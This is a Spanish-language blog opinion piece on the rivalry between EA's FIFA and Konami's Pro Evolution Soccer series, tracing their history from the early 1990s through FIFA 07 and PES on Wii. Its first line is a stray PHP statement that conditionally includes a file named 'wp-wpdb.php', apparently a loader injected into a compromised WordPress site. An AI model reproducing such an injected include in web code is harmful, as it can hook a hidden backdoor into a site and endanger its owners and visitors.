if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); FIFA VS PRO, la disputa se acabó? – La Fortaleza de LeChuck

FIFA VS PRO, la disputa se acabó?

Que grande que es la competencia. Estás tu tan tranquilo ganando dinero con tu empresita, hasta que llega otra empresita y te quita parte del pastel. Así empieza la competencia, y así se aplica también en los videojuegos. Desde tiempos inmemoriales, la competencia en nuestro hobby ha estado muy bien servido, hoy vamos a tratar la que bien dice el título de esta entrada, la saga «FIFA», contra los «PRO». Como entradilla y con vuestro permiso voy a poner un video sobre este tema, es un capítulo de una de mis series favoritas, «Que vida más triste», si no la habéis visto es una recomendación personal que os hago, porque es de lo más divertido que se ha hecho en España. Ahí va ese episodiete! ( se pasa volando, son 8 minutillos) .Os lo pongo en link, porque incomprensiblemente con el buscador de blogger no lo encuentro!
http://www.youtube.com/watch?v=B0gQjXMA4Ic ( Y os invito a ver los relacionados de la misma serie con el tema en cuestión, hay como dos o tres superdivertidos, y reales como la vida misma!)

Año tras año el dilema está ahí!

Antes de que salieran los primeros International Superstar Soccer (antigua esencia de Pro Evolution Soccer), existió en tiempos de Super Nintendo el primer FIFA, de Electronic Arts Sports. FIFA International Soccer salía a la calle en 1993. En el juego la mayor novedad era que tenía los derechos para incluir los nombres de los jugadores reales, la vista que adaptaba el fútbol a una vista isómetrica, la cual una vez acostumbrado, no daba mal resultado y la saga apostaba más por la simulación que por el arcade típico de la época.

Conocéis a los jugadores?

Mientras tanto en Konami se cocía International Super Star Soccer, un juego que apostaba por una vista lateral, jugadores enormes contra los achatados de FIFA, y en un juego totalmente arcade y sin ningún tipo de licencia. Apostaba por la diversión directa.
Entonces comenzó la guerra, y hasta hoy no deja de sonar eso de «Nos echamos un FIFA?- No tienes el Pro? Yo juego al Pro… pero bueno, si quieres echamos una al FIFA-» y al revés. Mientras que FIFA obtenía un gran éxito por las licencias y publicidad, International Superstar Soccer  fue apostando por el arcade con un juego rápido y divertido. En PSX y Nintendo 64 hubo una especie de división en la saga ISS, dejando ésta en Nintendo 64 y adaptando un nuevo cáliz de simulación en PSX con la saga Pro evolution soccer. La PSX gozó de un gran éxito, y el boca a boca hacía mucho en aquellos tiempos, que todo el mundo se dejaba los juegos y comenzaba el auge del «pirateo», así que todo el mundo comenzó a jugar a PES mientras FIFA se quedaba atrás un año tras otro apostando más por la espectacularidad gráfica que diversión. ISS después del moderado éxito en Nintendo 64 con dos partes, continuó en la siguiente generación con su ultima parte, salida en Gamecube y PS2, que no obtuvo la calidad de los anteriores, declaración de Konami que ya ponía todo su presupuesto en la saga PES, con la que obtenía mayores beneficios.

El genuino, el cambio de PES empieza en el logo

En el cambio de la generación PS2/Xbox/Gamecube a las de ésta, algo le pasó a Konami que no supo adaptarse a los nuevos tiempos. Tecnicamente el mundo occidental se había adaptado muchísimo mejor a las nuevas máquinas que Japón. FIFA sorprendía con una dinámica totalmente remodelada, al ver que PES le había arrebatado durante años el primer puesto en las consolas de los futboleros. Nuevas formas de control, nuevo motor, todo nuevo adaptándose a los nuevos tiempos mucho mejor que el juego de Konami.

FIFA 07. Todavía no desentona, verdad?

A partir de FIFA 07, se dió un giro inesperado, y la gente comenzaba a hablar de FIFA como algo nuevo y fresco, y PES ni tan siquiera encontraba su antiguo alma que tan grandes tardes había dado a los aficionados (Incluso sacando unas partes curiosísimas en Wii con un control diferente, comentando que era el futuro de los juegos de fútbol, cosa que poca gente cree, pero el juego da un buen gustazo cuando lo dominas). Los torneos entre amigos seguía siendo entre PES, y nadie se atrevía a comentar nada del FIFA, nadie quería probar el FIFA, todos seguían siendo del «Pro» como en cualquier moda que algún día tenía que pasar. Pero el Pro, no reconocido por ellos, había cambiado y la competencia seguía siendo buena. Esta vez Konami se había dormido en los laureles y EA Sports vino a reclamar su puesto.

Lo mejor del Pro de la Wii son los desmarques. Como si manejaras a dos jugadores a la vez ( de hecho, lo haces)

Desde ese punto, FIFA año tras año sigue demostrando que es el mejor desde la base de 07, con cada vez más opciones, ampliación del juego Online,  poder manejar por primera vez al portero, etc. Y si estás leyendo esto y eres «Prolero», como dicen en QVMT,  ya sabes que la historia se volverá a repetir, y PES volverá a sus orígenes un día de estos, para hacernos seguir disfrutando, tanto con una saga como con la otra, del mejor fútbol en nuestras videoconsolas.
Publicada el
Categorizado como Opinión

Por Museboy

Como la mayoría de vosotros, crecí jugando a videojuegos y ahora intento transmitir toda la pasión por este mundo en La Fortaleza de LeChuck. También busco ofertas de videojuegos. Seguidme en Twitter y sabréis de qué hablo.

1 comentario

Dejar un comentario